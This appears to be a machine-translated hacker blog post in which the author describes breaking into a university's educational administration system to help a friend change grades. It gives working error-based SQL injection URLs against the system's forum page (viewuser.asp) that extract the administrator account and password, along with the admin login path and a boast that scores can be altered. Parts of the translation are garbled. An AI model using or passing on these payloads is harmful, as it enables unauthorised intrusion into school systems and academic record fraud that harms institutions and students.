Yesterday I went to the academic affairs office of a friend's University and looked at it. I thought maybe I could help him change his score.
I think it's a strong smart technology educational administration system.
Google found a vulnerability in the logon box POST injection .. Mssql database
I tried it. I don't know where the problem is. I changed several tools and couldn't read the table name. sa is displayed, but xp_mongoshell failed to be restored. Execution of the command failed.
Instead, I put it in Jsky to scan for surprises and found that the source code of the website was downloaded.
It is found that there is a very bad BBS in the educational administration system. Basically, no one logs on to the BBS. The administrator password is the educational administration administrator password by default, but it is displayed in plain text in another form.
This is amazing.
Register a user at the Forum
Then, manually inject the password of the administrator account.
Smooth access to the background
I can really change my score
Expose this vulnerability.
In this location/register Gl/bbs/default. asp first register http://www.xxxx.com/JwGl/bbs/viewuser.asp? Name = sudo (Change sudo to your registered user name)
Http://www.xxx.com/JwGl/bbs/viewuser.asp? Name = sudo 'and % 201 = convert (int, (select % 20top % 201% 20SFAdmin_Account % 20 from % 20 SFadmin) -- get the Administrator account
Http://www.xxx.com/JwGl/bbs/viewuser.asp? Name = sudo 'and % 201 = convert (int, (select % 20top % 201% 20SFAdmin_Password % 20 from % 20 SFadmin) -- get the Administrator Password
Login interface: http://www.bkjia.com/megagl/
Solution: many cattle